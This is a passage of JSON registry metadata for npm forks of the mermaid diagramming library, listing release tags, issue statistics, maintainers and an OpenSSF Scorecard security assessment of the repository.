c7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:51.257Z","dependent_packages_count":0,"downloads":2,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":36.1839428201092,"dependent_packages_count":51.867230273458475,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":44.02558654678384},"purl":"pkg:npm/%40dwelle/mermaid","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@dwelle/mermaid","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@dwelle/mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@dwelle/mermaid/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dwelle%2Fmermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dwelle%2Fmermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dwelle%2Fmermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dwelle%2Fmermaid/related_packages","maintainers":[{"uuid":"dwelle","login":"dwelle","name":null,"email":"luzar.david@gmail.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~dwelle","role":null,"created_at":"2023-12-10T12:30:47.745Z","updated_at":"2023-12-10T12:30:47.745Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/dwelle/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":7648049,"name":"fork-mermaid","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, sequence diagrams, class diagrams, gantt charts and git graphs.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph"],"namespace":null,"versions_count":8,"first_release_published_at":"2023-04-26T09:30:27.278Z","latest_release_published_at":"2023-06-22T08:30:49.515Z","latest_release_number":"1.0.0-beta.8","last_synced_at":"2025-09-01T12:55:58.397Z","created_at":"2023-04-26T10:39:57.059Z","updated_at":"2025-09-01T14:17:51.257Z","registry_url":"https://www.npmjs.com/package/fork-mermaid","install_command":"npm install fork-mermaid","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.0.0-beta.8"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.